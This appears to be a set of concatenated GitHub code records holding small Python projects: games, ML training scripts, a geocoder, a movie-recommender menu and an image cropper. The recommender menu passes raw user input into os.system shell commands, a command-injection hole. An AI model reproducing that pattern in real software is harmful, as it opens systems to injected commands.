webconnect.wxWebControl(frame)\n#wc.OpenURI('www.opennet.ru')\n#frame.Show()\n#app.MainLoop()\n","repo_name":"kolosov/webconnect2","sub_path":"wcsip/wc_test.py","file_name":"wc_test.py","file_ext":"py","file_size_in_byte":1764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"37547819332","text":"\n# Switch2 testbench\n# \n# Sébastien Deriaz\n# 05.12.2022\n\n\nfrom clash_testbench import Chronogram, Testbench, Signal\nfrom os.path import join, dirname\nimport numpy as np\n\nfrom sun_phy.mr_fsk.mr_fsk_modulator import Mr_fsk_modulator\n\nfilepath = join(dirname(__file__), '../../SunPhy/Switch2.hs')\n\n\ndef test_Switch2():\n tb = Testbench(filepath, 'switch2')\n\n cg = Chronogram(join(dirname(__file__), 'test_Switch2.json'))\n\n tb.setInputs([\n cg[\"A_valid_i\"],\n cg[\"A_data_i\"],\n cg[\"A_last_i\"],\n cg[\"B_valid_i\"],\n cg[\"B_data_i\"],\n cg[\"B_last_i\"],\n cg[\"ready_i\"],\n cg[\"sel\"],\n ])\n tb.setExpectedOutputs([\n cg[\"A_ready_o\"],\n cg[\"B_ready_o\"],\n cg[\"valid_o\"],\n cg[\"data_o\"],\n cg[\"last_o\"]\n ])\n\n tb.setActualOutputsNames([\n \"A_ready_o (actual)\",\n \"B_ready_o (actual)\",\n \"valid_o (actual)\",\n \"data_o (actual)\",\n \"last_o (actual)\"\n ])\n\n cg.setTemplates({\n \"A_ready_o (actual)\" : \"A_ready_o\",\n \"B_ready_o (actual)\" : \"B_ready_o\",\n \"valid_o (actual)\" : \"valid_o\",\n \"data_o (actual)\" : \"data_o\",\n \"last_o (actual)\" : \"last_o\"\n })\n\n\n tb.run()\n\n cg.setSignals(tb.getAllSignals())\n cg.saveSVG(join(dirname(__file__), 'test_Switch2.svg'))\n\n for s in tb:\n if s.isChecked():\n s.print(True)\n assert s.isValid(), s.message()\n else:\n s.print(True)","repo_name":"SebastienDeriaz/clash_sun_phy","sub_path":"src/Tests/Switch2/test_Switch2.py","file_name":"test_Switch2.py","file_ext":"py","file_size_in_byte":1470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"38442685582","text":"import matplotlib\nimport numpy as np\nimport matplotlib.pyplot as plt\n# from lab_utils_uni import plt_intuition, plt_stationary, plt_update_onclick, soup_bowl\n\n\ndef compute_cost(x, y, w, b):\n # x - data, m examples\n # y -target vals\n # w, b - scalar - model parameters\n # returns total_cost of using w, b parameters for linear regression\n\n m = x.shape[0]\n cost_sum = 0\n\n for i in range(m):\n f_wb = w * x[i] + b\n cost = (f_wb - y[i]) ** 2\n cost_sum += cost\n\n total_cost = (1 / (2 * m)) * cost_sum\n\n return total_cost\n\n\nx_train = np.array([1.0, 2.0])\ny_train = np.array([300.0, 500.0])\n\n","repo_name":"pformela/python_ai","sub_path":"stanford/week1/cost_function.py","file_name":"cost_function.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"38469830198","text":"\"\"\"\nName: Kizito Jegede\nID: Codestar007\nCourse: MSc CS - PoP 1\n\nAssignment Two: (Please refer to 'README.dm' for full specification)\nProgram Title: Hundred\nProgram Description: An interactive game in which two players take\n turns to roll a die. At the end of each turn, the\n score for that turn is added to the player's total\n score. The first player to reach or exceed 100 wins.\n\"\"\"\n\n\ndef main():\n \"\"\"The program starts execution here. It calls various\n functions to print game instructions, execute computer and human\n player turns, check and apply fair play rule (if required), apply\n tie break and prints the game result.\n \"\"\"\n\n computer_turns = 0\n human_turns = 0\n count_of_turns = 0\n computer_score = 0\n human_score = 0\n\n instructions() # print game instructions\n while not is_game_over(computer_score, human_score):\n play_result = play_game(count_of_turns, computer_turns,\n computer_score, human_turns, human_score)\n (count_of_turns, computer_turns, computer_score, human_turns,\n human_score) = play_result\n\n\t\t# Apply fair play rule if required; human gets one more turn\n if computer_score >= 100 and human_score < computer_score:\n human_turns += 1\n print(\"\\nTurn:\", human_turns, \" (Fair play) | You\")\n human_score += human_move(computer_score, human_score)\n\n while computer_score == human_score >= 100: # Tie breaker.\n play_result = play_game(count_of_turns, computer_turns,\n computer_score, human_turns, human_score)\n (count_of_turns, computer_turns, computer_score, human_turns,\n human_score) = play_result\n\n show_results(computer_score, human_score) # Print result\n\ndef play_game(count_of_turns, c_turns, c_score, h_turns, h_score):\n \"\"\"Function is implemented to streamline the lenght of code in\n \"main()\". It takes 5 parameters; count of turns, computer\n turns, computer score, human turns, human score and returns the\n updated values as a 5 tuple (int).\n \"\"\"\n\n # Computer Move call\n count_of_turns += 1\n c_turns += 1\n print(\"\\nTurn:\", c_turns, \"| Computer\") # Computer's header\n c_score += computer_move(c_score, h_score)\n\n # Human Move call\n h_turns += 1\n print(\"\\nTurn:\", h_turns, \"| You\") # Human's header\n h_score += human_move(c_score, h_score)\n\n return (count_of_turns, c_turns, c_score, h_turns, h_score)\n\ndef instructions():\n \"\"\"This function tells the player the rules of the game.\"\"\"\n print(\"\"\"Below are the rules of the game:\n 1. You will take turns to play against the computer\n 2. The computer always plays first\n 3. On each turn, you roll a six-sided die as many times as\n you wish, or until tyou roll a 1\n 4. Each number you roll, except a 1, is added to your\n score this turn\n 5. But if you roll a 1, your score for this turn is zero, and\n your turn ends\n 6. At the end of each turn, your score for that turn is added to\n your total score\n 7. The first player to reach or exceed 100 wins the game.\n 8. if the computer reaches or exceeds 100 first, you will\n get one additional turn\n 9. If you are and the computer are tied with 100 or more,\n you will both get another turn until the tie is broken.\"\"\")\n print(\"\\nThe Game is starting....\")\n\ndef human_move(computer_score, human_score):\n \"\"\"This function displays a player's and the computer's current\n score, and how far behind (or ahead) the player is. Then repeatedly\n asks whether the player wants to roll again. This continues until either:\n - The player decides not to roll again. The function returns the\n total of the rolls made during this move.\n - The player rolls a 1. The function returns 0.\n Arguments (Type):= current computer and human scores (*integer*).\n \"\"\"\n\n sum_of_rolls = 0\n prompt = \"Roll die again? 'Y' or 'N':\"\n\n print(\"Current scores:\", \"You =\", human_score, # print current score\n \"| Computer =\", computer_score)\n print(compare_scores(computer_score, human_score))\n\n while True: # Asks whether player wants to roll again\n if ask_yes_or_no(prompt):\n this_roll = roll()\n if this_roll == 1:\n return 0\n else:\n sum_of_rolls += this_roll\n else:\n return sum_of_rolls\n\ndef compare_scores(computer_score, human_score):\n \"\"\"This funcion constructs a comparison between the current human\n and computer_score and returns a string value.\n Arguments (Type):= current computer and human scores (*integer*).\n \"\"\"\n\n score_diff = human_score - computer_score\n if score_diff > 0:\n return \"You are \" + str(abs(score_diff)) + \" AHEAD of the Computer\"\n elif score_diff < 0:\n return \"You are \" + str(abs(score_diff)) + \" BEHIND the Computer\"\n else:\n return \"You are level with the Computer at \" + str(human_score)\n\ndef computer_move(computer_score, human_score):\n \"\"\"This function computes the computer rolls some number of times,\n displays the result of each roll, and the function returns the\n result (either 0 or the total of the rolls). The function uses an\n algorithim to determine frequency of play: `gently` when computer\n is ahead and agressively if it is behind.\n Arguments (Type):= current computer and human scores (*integer*).\n \"\"\"\n\n total_of_rolls = 0\n aggressive = 5\n gently = 2\n\n if computer_score - human_score <= 0: # Computer selects play style\n style = aggressive\n else:\n style = gently\n\n for i in range(1, 1 + style):\n this_roll = roll()\n print(\"Computer roll:\", i, \"number =\", this_roll)\n if this_roll == 1:\n return 0\n else:\n total_of_rolls += this_roll\n return total_of_rolls\n\ndef is_game_over(computer_score, human_score):\n \"\"\"Returns `True` if either player has 100 or more, and the players\n are not tied, otherwise it returns `False`. Called  only after\n the human player's move.\n Arguments (Type):= current computer and human scores (*integer*).\n \"\"\"\n\n return ((computer_score >= 100 or human_score >= 100)\n and computer_score != human_score)\n\ndef roll():\n \"\"\"Returns a random number in the range 1 to 6\"\"\"\n from random import randint\n return randint(1, 6)\n\ndef ask_yes_or_no(prompt):\n \"\"\"Prints the prompt as a question to the player. Returns `True`\n if player responds with a string with first character `'y'` or `'Y'`,\n returns `False` if first character of player response is `'n'` or `'N'`\n else repeats question until the player provides an acceptable response.\n \"\"\"\n\n response = input(prompt)\n try:\n if response[0] in {\"Y\", \"y\"}:\n return True\n elif response[0] in {'N', 'n'}:\n return False\n else:\n return ask_yes_or_no(prompt)\n except IndexError:\n return ask_yes_or_no(prompt)\n\ndef show_results(computer_score, human_score):\n \"\"\"Function is called when the game has ended to tell\n whether the human player won or lost, and by how much.\n Arguments (Type):= current computer and human scores (*integer*).\n \"\"\"\n\n if computer_score > human_score:\n print(\"\\nGame Over!! You LOST by: \"\n + str(computer_score - human_score))\n else:\n print(\"\\nGame Over!! You WON by: \"\n + str(human_score - computer_score))\n\nif __name__ == '__main__':\n main()\n","repo_name":"Codestar007/PoP1_ExamPractice","sub_path":"AllRepos/assignment-two-hundred-Codestar007/Hundred.py","file_name":"Hundred.py","file_ext":"py","file_size_in_byte":7645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"37591201054","text":"class Glass:\n def __init__(self, capacity_volume: [int, float], occupied_volume: [int, float]):\n if not isinstance(capacity_volume, (int, float)):\n raise TypeError\n if not capacity_volume > 0:\n raise ValueError\n self.capacity_volume = capacity_volume # объем стакана\n\n if not isinstance(occupied_volume, (int, float)):\n raise TypeError\n if occupied_volume < 0:\n raise ValueError\n self.occupied_volume = occupied_volume # объем жидкости в стакане\n\n\nif __name__ == \"__main__\":\n glass1 = Glass(200, 100) # экземпляр класса\n glass2 = Glass(500, 50) # экземпляр класса\n\n incorrect_capacity_volume_type = ...\n incorrect_occupied_volume_value = ...","repo_name":"LorenzoY2J/PythonPY200","sub_path":"Основы ООП/Практические задания/task1_Glass__init__/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"72287168056","text":"import pandas as pd\nfrom collections import Counter\nimport time\nimport wandb\nimport pickle\nfrom wandb.keras import WandbCallback\nwandb.init(project=\"GALE_LIME_NER_LSTM_CRF_DISEASE\", entity=\"robofied\")\n\nfrom tensorflow import keras\nfrom tensorflow.keras import layers\nfrom tensorflow.keras.utils import pad_sequences\nfrom sklearn.model_selection import train_test_split\nimport matplotlib.pyplot as plt\n\n'''\nTo create Neural Network architectures\n'''\nclass NeuralNetwork(object):\n #Setting properties to be used in Neural Network\n def __init__(self, data):\n self.n_sent = 1\n self.data = data\n self.words = list(set(data[\"Word\"].values))\n self.n_words = len(self.words)\n self.tags = list(set(self.data[\"Tag\"].values))\n self.n_tags = len(self.tags)\n self.empty = False\n agg_func = lambda s: [(w, p, t) for w, p, t in zip(s[\"Word\"].values.tolist(), s[\"POS\"].values.tolist(), s[\"Tag\"].values.tolist())]\n self.grouped = self.data.groupby(\"Sentence\").apply(agg_func)\n self.sentences = [s for s in self.grouped]\n \n\n def get_next(self):\n try:\n s = self.grouped[\"Sentence: {}\".format(self.n_sent)]\n self.n_sent += 1\n return s\n except:\n return None\n\n #To endcode data for training\n def Data_Encoding(self):\n labels = [[s[2] for s in sent] for sent in self.sentences]\n sentences = [\" \".join([s[0] for s in sent]) for sent in self.sentences]\n word_cnt = Counter(self.data[\"Word\"].values)\n vocabulary = set(w[0] for w in word_cnt.most_common(5000))\n self.max_len = 114\n word2idx = {\"PAD\": 0, \"UNK\": 1}\n word2idx.update({w: i for i, w in enumerate(self.words) if w in vocabulary})\n tag2idx = {t: i for i, t in enumerate(self.tags)}\n\n #Saving word2idx, tag2idx for later use\n with open('../data/word2idx.pkl', 'wb') as f:\n pickle.dump(word2idx, f)\n \n with open('../data/tag2idx.pkl', 'wb') as f:\n pickle.dump(tag2idx, f)\n\n X = [[word2idx.get(w, word2idx[\"UNK\"]) for w in s.split()] for s in sentences]\n X = pad_sequences(maxlen=self.max_len, sequences=X, padding=\"post\", value=word2idx[\"PAD\"])\n y = [[tag2idx[l_i] for l_i in l] for l in labels]\n y = pad_sequences(maxlen=self.max_len, sequences=y, padding=\"post\", value=tag2idx[\"|O\\n\"])\n self.X_tr, self.X_te, self.y_tr, self.y_te = train_test_split(X, y, test_size=0.2, shuffle=False)\n print(\"Completed till split\")\n \n #LSTM Model for training\n def LSTM_NN(self):\n wandb.config = {\"learning_rate\": 0.001,\n \"epochs\": 100,\n \"batch_size\": 128}\n \n word_input = keras.Input(shape=(self.max_len,))\n model = layers.Embedding(input_dim=self.n_words, output_dim=50, input_length=self.max_len)(word_input)\n model = layers.SpatialDropout1D(0.1)(model)\n model = layers.Bidirectional(layers.LSTM(units=100, return_sequences=True, recurrent_dropout=0.1))(model)\n out = layers.TimeDistributed(layers.Dense(self.n_tags, activation=\"softmax\"))(model)\n model = keras.Model(word_input, out)\n opt = keras.optimizers.Adam(learning_rate = 0.001)\n model.compile(optimizer=opt, loss=\"sparse_categorical_crossentropy\", metrics=[\"accuracy\"])\n self.history = model.fit(self.X_tr, self.y_tr.reshape(*self.y_tr.shape, 1), batch_size=32, epochs=20, validation_split=0.2, verbose=1, callbacks=[WandbCallback()])\n name = '../models/' + 'ckpt' +str(time.time()) + '.h5'\n model.save(name)\n print(\"Model saved in model directory...\")\n return self.history\n\n #Training Plots for Accuracy and Loss\n def Training_Plots(self):\n history = self.history\n plt.plot(history.history['accuracy'])\n plt.plot(history.history['val_accuracy'])\n plt.title('model accuracy')\n plt.ylabel('accuracy')\n plt.xlabel('epoch')\n plt.legend(['train', 'val'], loc='upper left')\n acc_fig_name = '../figures/' + 'ckpt_acc' +str(time.time()) + '.png'\n plt.savefig(acc_fig_name)\n plt.clf()\n\n plt.plot(history.history['loss'])\n plt.plot(history.history['val_loss'])\n plt.title('model loss')\n plt.ylabel('loss')\n plt.xlabel('epoch')\n plt.legend(['train', 'val'], loc='upper left')\n loss_fig_name = '../figures/' + 'ckpt_loss' +str(time.time()) + '.png'\n plt.savefig(loss_fig_name)\n","repo_name":"Akshat4112/Interpreting-Bidirectional-CRF-LSTM-for-Disease-Entity-Recognition","sub_path":"code/Train.py","file_name":"Train.py","file_ext":"py","file_size_in_byte":4548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"663061113","text":"import csv\nimport geocoder\nimport sqlite3\n\n#Gets API keys\ndef get_keys():\n '''Returns a dictionary of API keys from the keys.csv file'''\n\n with open(\"keys.csv\", 'r') as f:\n csv_r = csv.reader(f)\n key_d = {r[0]:r[1] for r in csv_r}\n\n return key_d\n\n#Updates location table with place names\ndef rev_geocode_locs(db='Session_db.db'):\n '''Takes 1 argument - db - path to sqlite db.\n Updates the Location table with reverse geocoded location names using MapQuest API'''\n\n k = get_keys()['MapQuest']\n con = sqlite3.connect(db)\n cur = con.cursor()\n get_locs_sql = \"SELECT id, Lat, Lon FROM Location\"\n pop_locs_sql = '''UPDATE Location SET Name = \"{s}, {c}, {p}\" WHERE id = {i}'''\n cur.execute(get_locs_sql)\n co_ords = cur.fetchall()\n\n for c in co_ords:\n g = geocoder.mapquest([c[1], c[2]], method='reverse', key=k)\n geo = g.json\n street = 'unid' if 'street' not in geo else geo['street']\n city = 'unid' if 'city' not in geo else geo['city']\n postcode = 'unid' if 'postcode' not in geo else geo['postcode']\n cur.execute(pop_locs_sql.format(s=street, c=city, p=postcode, i=c[0]))\n\n cur.close()\n con.commit()\n con.close()\n","repo_name":"hedgelawn6/bike_gps","sub_path":"geo_db.py","file_name":"geo_db.py","file_ext":"py","file_size_in_byte":1215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"34845203237","text":"class Solution:\n def matrixReshape(self, nums: List[List[int]], r: int, c: int) -> List[List[int]]:\n if not nums:\n return []\n H = len(nums)\n L = len(nums[0])\n if H*L != r*c:\n return nums\n ans = []\n for i in range(r):\n rowi = []\n for j in range(c):\n rowi.append(nums[(i*c+j)//L][(i*c+j)%L])\n ans.append(rowi)\n return ans\n ","repo_name":"jianq1994/leetcode","sub_path":"python/566_reshape_the_matrix.py","file_name":"566_reshape_the_matrix.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"70934928377","text":"#!/usr/bin/python\n\nimport pyfiglet\nimport os\n \ntitle = pyfiglet.figlet_format(\"Movie Recommendator\")\nmenu_options = {\n 0: 'Download Datasets (Essential)',\n 1: 'Movies for adults or children',\n 2: 'Best rated movies by year',\n 3: 'Best runtime',\n 4: 'Ratings per IMDb type',\n 5: 'Best movies from a given genre',\n 6: 'Best movies from a given title',\n 7: 'Is it worth to watch this movie?',\n 8: 'Best movies by year and region',\n 9: 'Exit',\n}\n\nprint(title)\ndef print_menu():\n for key in menu_options.keys():\n print (key, '--', menu_options[key] )\n\ndef download():\n print('Starting Download...')\n os.system('python download_datasets.py || python3 download_datasets.py')\n\ndef adult_child(master):\n print('You selected \\'Movies for adults or children\\'')\n arg = input('Enter \\'-a\\' for adult or \\'-c\\' for child: ')\n num = input('Enter the number of movies you want to be shown(Optional): ')\n os.system('spark-submit --master ' + master + ' adult_child_movies.py ' + arg + ' ' + num)\n\ndef by_year(master):\n print('You selected \\'Best rated movies by year\\'')\n mode = input('Enter \\'-m\\' for MovieLens results or \\'-i\\' for IMDb results: ')\n year = input('Enter a year: ')\n num = input('Enter the number of movies you want to be shown(Optional): ')\n os.system('spark-submit --master ' + master + ' best_rated_movies_by_year.py ' + mode + ' ' + year + ' ' + num)\n\ndef runtime(master):\n print('You selected \\'Best runtime\\'')\n _show = input('Enter how many you wanna see(Optional): ')\n ratinglvl = input('Enter the rating level(Optional): ')\n minRun = input('Enter the minimum runtime(Optional): ')\n maxRun = input('Enter the maximum runtime(Optional): ')\n arg = input('Enter a command (-avg, -min, -max, -sum) (Optional): ')\n if arg != '': os.system('spark-submit --master ' + master + ' best_runtime.py ' + ratinglvl + ' ' + minRun + ' ' + maxRun + ' ' + arg + ' ' + _show)\n else: os.system('spark-submit --master ' + master + ' best_runtime.py ' + ratinglvl + ' ' + minRun + ' ' + maxRun + ' ' + _show)\n\ndef imdb_type(master):\n print('You selected \\'Ratings per IMDb type\\'')\n type = input('Enter the type(Enter -help or -h for help): ')\n ratinglvl = input('Enter the rating level: ')\n count = input('Enter the number of movies you want to be shown: ')\n os.system('spark-submit --master ' + master + ' getRatingsPerIMDbType.py ' + type + ' ' + ratinglvl + ' ' + count)\n\ndef by_genre(master):\n print('You selected \\'Best movies from a given genre\\'')\n mode = input('Enter \\'-m\\' for MovieLens results or \\'-i\\' for IMDb results: ')\n genre = input('Enter a movie genre: ')\n num = input('Enter the number of movies you want to be shown(Optional): ')\n os.system('spark-submit --master ' + master + ' movies_by_genre.py ' + mode + ' ' + genre + ' ' + num)\n\ndef by_title(master):\n print('You selected \\'Best movies from a given title\\'')\n title = input('Enter a movie title: ')\n os.system('spark-submit --master ' + master + ' movies_by_title.py \\'' + title + '\\'')\n \ndef is_worth(master):\n print('You selected \\'Is it worth to watch this movie?\\'')\n title = input('Enter a movie title: ')\n os.system('spark-submit --master ' + master + ' worth_movie.py \\'' + title + '\\'')\n \ndef year_region(master):\n print('You selected \\'Best movies by year and region\\'')\n data = input('Enter a year or a language: ')\n num = input('Enter the number of movies you want to be shown(Optional): ')\n os.system('spark-submit --master ' + master + ' year_region_recommendations.py \\'' + data + '\\' ' + num)\n\nif __name__=='__main__':\n \n master = ''\n print('The scripts will be submited to Spark in local mode. In order to submit them in the cloud, please follow the steps described in README.md file.')\n \n while not master:\n try:\n inCores = input('Enter the number of cores you want to use to run the application (\\'*\\' for all cores available): ')\n cores = int(inCores)\n if cores > 0:\n \tmaster = 'local[' + str(cores) + ']'\n \tprint('The scripts will be run locally with ' + str(cores) + ' cores.')\n else:\n \tprint('Invalid number. The number of cores must be greater or equal to 1')\n except:\n if not inCores == '*':\n print('Wrong input. Please enter a number or \\'*\\' ...')\n else:\n master = 'local[*]'\n print('The scripts will be run locally with all the cores available.')\n\n while(True):\n print_menu()\n option = ''\n try:\n option = int(input('Enter your choice: '))\n except:\n print('Wrong input. Please enter a number ...')\n #Check what choice was entered and act accordingly\n if option == 0:\n \t download()\n elif option == 1:\n adult_child(master)\n elif option == 2:\n by_year(master)\n elif option == 3:\n runtime(master)\n elif option == 4:\n imdb_type(master)\n elif option == 5:\n by_genre(master)\n elif option == 6:\n by_title(master)\n elif option == 7:\n is_worth(master)\n elif option == 8:\n year_region(master)\n elif option == 9:\n print('Thanks for using our recommender')\n exit()\n \n else:\n print('Invalid option. Please enter a number between 0 and 9.')\n","repo_name":"GitWAMH/Cloud_project","sub_path":"scripts/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"2510407910","text":"import numpy as np\nimport pandas as pd\nimport matplotlib\nmatplotlib.use('TkAgg')\n# matplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nimport torch\nfrom torch.distributions.multivariate_normal import MultivariateNormal\nimport torch.nn as nn\nfrom torchvision import datasets, transforms\nfrom torch.utils.data import DataLoader\nfrom sklearn import datasets as sklearn_datasets\n\n\nWEIGHT_DECAY = 1/100\n\n\ndata_ = sklearn_datasets.make_moons(n_samples=2_000, noise=1/20)[0].astype('float32')\nnorm = nn.BatchNorm1d(num_features=2)\nnormalized_data = norm(torch.tensor(data_))\n# plt.scatter(data[:, 0], data[:, 1], c='r')\n# plt.scatter(normalized_data[:, 0].detach().numpy(), normalized_data[:, 1].detach().numpy(), c='b')\n# plt.show()\n\n\nclass Coupling(nn.Module):\n def __init__(self, input_dim=2):\n super().__init__()\n self.s_layer_1 = nn.Linear(input_dim, 256)\n self.s_layer_2 = nn.Linear(256, 256)\n self.s_layer_3 = nn.Linear(256, 256)\n self.s_layer_4 = nn.Linear(256, 256)\n self.s_layer_5 = nn.Linear(256, input_dim)\n self.t_layer_1 = nn.Linear(input_dim, 256)\n self.t_layer_2 = nn.Linear(256, 256)\n self.t_layer_3 = nn.Linear(256, 256)\n self.t_layer_4 = nn.Linear(256, 256)\n self.t_layer_5 = nn.Linear(256, input_dim)\n\n def forward(self, x):\n s = self.s_layer_1(x)\n s = self.s_layer_2(s)\n s = self.s_layer_3(s)\n s = self.s_layer_4(s)\n s = self.s_layer_5(s)\n t = self.t_layer_1(x)\n t = self.t_layer_2(t)\n t = self.t_layer_3(t)\n t = self.t_layer_4(t)\n t = self.t_layer_5(t)\n return s, t\n\n\ncoupling = Coupling()\n\n\nclass RealNVP(nn.Module):\n def __init__(self, input_dim, n_coupling_layers):\n super().__init__()\n self.standard_gaussian = MultivariateNormal(\n loc=torch.tensor([0. for _ in range(input_dim)]),\n covariance_matrix=torch.diag(torch.tensor([1. for _ in range(input_dim)]))\n )\n # self.masks = torch.tensor(\n # [[0., 1.], [1., 0.]] * (n_coupling_layers // 2)\n # )\n mask_arrays = [[0. for _ in range(input_dim)] for _ in range(input_dim)]\n for i in range(input_dim):\n mask_arrays[(input_dim-1) - i][i] = 1.\n self.masks = torch.tensor(\n mask_arrays * (n_coupling_layers // 2)\n )\n # self.coupling_layers = [Coupling(input_dim) for _ in range(n_coupling_layers)]\n self.coupling_layers = nn.ModuleList()\n for _ in range(n_coupling_layers):\n self.coupling_layers.append(Coupling(input_dim))\n\n def forward(self, x, training=False):\n\n log_det_inv = 0\n direction = -1 if training else 1\n output = None\n\n for i in range(len(self.coupling_layers))[::direction]:\n\n reverse_mask = 1 - self.masks[i]\n\n x_masked = x * self.masks[i]\n s, t = self.coupling_layers[i](x_masked)\n s = s * reverse_mask\n t = t * reverse_mask\n\n gate = (direction - 1) / 2 # gate is close (gate=0) if direction=1, i.e., Training=False\n\n output = (\n reverse_mask *\n (x * torch.exp(s * direction)) + (t * direction * torch.exp(s * gate))\n ) + x_masked\n log_det_inv = log_det_inv + (torch.sum(s, dim=-1) * gate)\n\n return output, log_det_inv\n\n def log_loss(self, x):\n output, log_det = self(x, training=True)\n # .log_prob takes ln of the value f(x) where f is the pdf (the actual y value in the distribution)\n log_likelihood = self.standard_gaussian.log_prob(output) + log_det\n return torch.mean(-log_likelihood)\n\n\nreal_nvp = RealNVP(input_dim=2, n_coupling_layers=4)\noptimizer = torch.optim.Adam(params=real_nvp.parameters(), lr=1/100_000, weight_decay=WEIGHT_DECAY)\n\n\ndef fit(model, optim, data, n_epochs=500):\n losses = []\n for ep in range(1, n_epochs+1):\n optim.zero_grad()\n model.train()\n loss = model.log_loss(data)\n loss.backward(retain_graph=True) # need this for iterating through nn.ModuleList()\n torch.nn.utils.clip_grad_norm_(model.parameters(), max_norm=1.0) # gradient clipping\n optim.step()\n losses.append(loss.detach().numpy())\n print('Episode %d | loss: %.4f' % (ep, losses[-1]))\n\n\nfit(real_nvp, optimizer, normalized_data)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Talon1989/generative-ai","sub_path":"TorchRealNVP.py","file_name":"TorchRealNVP.py","file_ext":"py","file_size_in_byte":4443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"14944346401","text":"# 2. swap-case : https://www.hackerrank.com/challenges/swap-case\ndef swap_case1(input_string):\n input_string = list(input_string)\n toggle_string = ''\n for value in input_string:\n ascii_value = ord(value)\n if 65 <= ascii_value <= 90:\n toggle_string += chr(ascii_value + 32)\n elif 97 <= ascii_value <= 122:\n toggle_string += chr(ascii_value - 32)\n else:\n toggle_string += value\n return toggle_string\n\n\ndef swap_case(input_string):\n return ''.join(value.lower() if value.isupper() else value.upper() for value in input_string)\n\n\nif __name__ == '__main__':\n s = input()\n result = swap_case(s)\n print(result)\n","repo_name":"mahfuz110244/hackerrank","sub_path":"swap_case.py","file_name":"swap_case.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"23105828007","text":"# Merge with attraction picture downloader\n\nimport cv2\nimport glob\n\n# Loop through every image in Attraction Pictures\nfor file in glob.glob(\"Attraction Pictures/*\"):\n\n # Check to make sure that a file is a jpeg\n if file.endswith('.jpg'):\n\n try:\n # Read image as a matrix of pixels\n pic = cv2.imread(file)\n\n # Unpack matrix into multiple lists\n height, width, color = pic.shape\n\n # Take half of height and width to find the center of the image\n mid_height = int(height / 2)\n mid_width = int(width / 2)\n\n # Case 1: length and width are both greater than 400 ---> length and width are both cropped to center 400x400 pixels\n if ((mid_height > 200) and (mid_width > 200)):\n\n # Constants needed for cropping\n w = 400\n h = 400\n x = mid_width - w / 2\n y = mid_height - h / 2\n\n # Cropping picture using list indexing\n cropped_pic = pic[int(y):int(y + h), int(x):int(x + w)]\n\n # Write in the cropped image over the old image\n cv2.imwrite(file, cropped_pic)\n\n print(\" >400 height by >400 width jpg was cut.\")\n # Case 2: height is greater than 400, but width is less than or equal to 400 ---> crop height to size of width\n elif ((mid_height > 200) and (mid_width <= 200)):\n\n # Constants needed for cropping\n w = width\n h = width\n y = mid_height - h / 2\n\n # Cropping picture using list indexing\n cropped_pic = pic[int(y):int(y + h), 0:int(width)]\n\n # Write in the cropped image over the old image\n cv2.imwrite(file, cropped_pic)\n\n print(\" >400 height by <=400 width jpg was cut.\")\n # Case 3: width is greater than 400, but height is less than or equal to 400 ---> crop height to size of height\n elif ((mid_height <= 200) and (mid_width > 200)):\n\n # Constants needed for cropping\n w = height\n h = height\n x = mid_height - h / 2\n\n # Cropping picture using list indexing\n cropped_pic = pic[0:int(height), int(x):int(x + w)]\n\n # Write in the cropped image over the old image\n cv2.imwrite(file, cropped_pic)\n\n print(\" >400 height by <=400 width jpg was cut.\")\n # Case 4: both width and height are less than/equal to 400 ---> crop height or width to the size of the smaller one\n elif ((mid_height <= 200) and (mid_width <= 200)):\n\n # Case 4A: width is smaller than height\n if width < height:\n\n # Constants needed for cropping\n w = width\n h = width\n y = mid_height - h / 2\n\n # Cropping picture using list indexing\n cropped_pic = pic[int(y):int(y + h), 0:int(width)]\n\n # Write in the cropped image over the old image\n cv2.imwrite(file, cropped_pic)\n\n print(\"<400 height by <400 width jpg was cut.\")\n # Case 4B: height is smaller than width\n elif height < width:\n\n # Constants needed for cropping\n w = height\n h = height\n x = mid_height - h / 2\n\n # Cropping picture using list indexing\n cropped_pic = pic[0:int(height), int(x):int(x + w)]\n\n # Write in the cropped image over the old image\n cv2.imwrite(file, cropped_pic)\n\n print(\"<400 height by <400 width jpg was cut.\")\n # jpeg is already a square of the appropriate size and does not need to be cut more\n else:\n\n print(\"jpg is already a square that is 400 by 400 or smaller\")\n # jpeg was not cut for some reason and needs to be cut manually\n except:\n\n print(\"PROBLEM: UNABLE TO CUT JPEG!!!\", file)\n # image is not a jpeg and, thus, can not be cut\n else:\n\n print(\"UNABLE TO CUT FILE\", file, \"because it is not a jpg\")","repo_name":"DeerEdge/Traveler-Discover-Your-Next-Destination","sub_path":"Attraction Data Scraping Programs/image_cropper.py","file_name":"image_cropper.py","file_ext":"py","file_size_in_byte":4321,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"2"} +{"seq_id":"42725886299","text":"N, t = list(map(int, input().split()))\narr = list(map(int, input().split()))\n\nif t == 1:\n\tflag = 1\n\ts = set(arr)\n\tfor i in arr:\n\t\tif 7777-i in s:\n\t\t\tprint(\"Yes\")\n\t\t\tflag = 